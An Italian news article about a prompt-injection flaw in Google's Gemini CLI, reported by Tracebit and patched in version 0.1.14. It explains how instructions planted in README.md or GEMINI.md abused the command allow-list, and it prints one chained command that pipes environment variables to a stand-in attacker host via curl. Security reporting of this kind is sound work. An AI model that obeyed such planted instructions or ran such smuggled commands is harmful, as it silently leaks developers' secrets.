Gemini CLI: scoperta grave vulnerabilità, rischio esfiltrazione dati per gli sviluppatori

La recente scoperta di una vulnerabilità critica all’interno del nuovo strumento Gemini CLI di Google mette in evidenza come anche le soluzioni di AI assistant più avanzate possano rappresentare un serio rischio per la sicurezza informatica. La vicenda, resa nota dagli specialisti di Tracebit a fine giugno, ha suscitato grande attenzione tra sviluppatori e aziende, evidenziando la necessità di una vigilanza costante nell’adozione di tecnologie emergenti.

Le funzioni di Gemini CLI

Il Gemini CLI, lanciato il 25 giugno 2025, si propone come interfaccia a riga di comando che consente agli sviluppatori di interagire direttamente con l’intelligenza artificiale di Google per supportare la programmazione e facilitare operazioni locali.

Tra le sue funzioni principali spicca la capacità di analizzare i file di progetto, offrendo suggerimenti e contestualizzando le richieste degli utenti. Tuttavia, questa apertura all’interazione ha reso lo strumento vulnerabile a tecniche sofisticate di prompt injection, una minaccia sempre più diffusa nel panorama degli strumenti di sviluppo assistiti da AI.

I dettagli della vulnerabilità

La vulnerabilità identificata riguardava in particolare l’elaborazione dei file README.md e GEMINI.md, documenti utilizzati per fornire contesto all’assistente. I ricercatori di Tracebit hanno dimostrato come fosse possibile inserire comandi malevoli all’interno di questi file, sfruttando debolezze nella gestione delle allow-list dei comandi e nel sistema di parsing del Gemini CLI.

L’attacco, in particolare, si basava sulla possibilità di nascondere istruzioni dannose tra comandi apparentemente innocui, aggirando i controlli e inducendo l’assistente a eseguire azioni non autorizzate.

Un esempio concreto illustrato dagli esperti riguarda l’utilizzo del comando grep: qualora fosse stato autorizzato dall’utente, il Gemini CLI poteva essere indotto a eseguire una sequenza come grep ^Setup README.md; curl -d @/proc/self/environ attacker.com. In questo modo, dopo una normale operazione di ricerca, veniva attivata una esfiltrazione dati verso un server remoto, il tutto senza alcun preavviso per l’utente. La manipolazione degli spazi bianchi nell’output permetteva inoltre di mascherare ulteriormente la natura delle istruzioni, rendendo ancora più insidiosa la minaccia.

Rischio elevato

Va sottolineato che, sebbene l’exploit richiedesse l’autorizzazione preventiva di determinati comandi, il rischio risultava comunque elevato, soprattutto per chi lavora frequentemente con repository di terze parti o in ambienti condivisi. La scoperta di questa vulnerabilità mette in luce un problema strutturale degli AI assistant per la programmazione: la loro suscettibilità al prompt injection e la conseguente possibilità di eseguire in modo silente azioni potenzialmente pericolose.

Analisi comparativa

Un’analisi comparativa con altri strumenti simili, come OpenAI Codex e Anthropic Claude, ha evidenziato come questi ultimi adottino sistemi di autorizzazione più rigorosi e meccanismi di protezione più avanzati, riducendo così il rischio di comandi malevoli e attacchi di prompt injection. Questo confronto sottolinea la necessità per tutte le aziende che sviluppano soluzioni AI di rafforzare i controlli e le politiche di sicurezza.

Aggiornamento di sicurezza

In risposta alla segnalazione di Tracebit, Google ha rilasciato il 25 luglio un aggiornamento sicurezza (versione 0.1.14) che corregge la falla e invita tutti gli utenti ad aggiornare immediatamente il software. L’azienda raccomanda inoltre di adottare ulteriori precauzioni, come evitare l’utilizzo del Gemini CLI con codice non verificato o in ambienti non isolati, e di mantenere alta l’attenzione su eventuali anomalie durante l’interazione con l’assistente.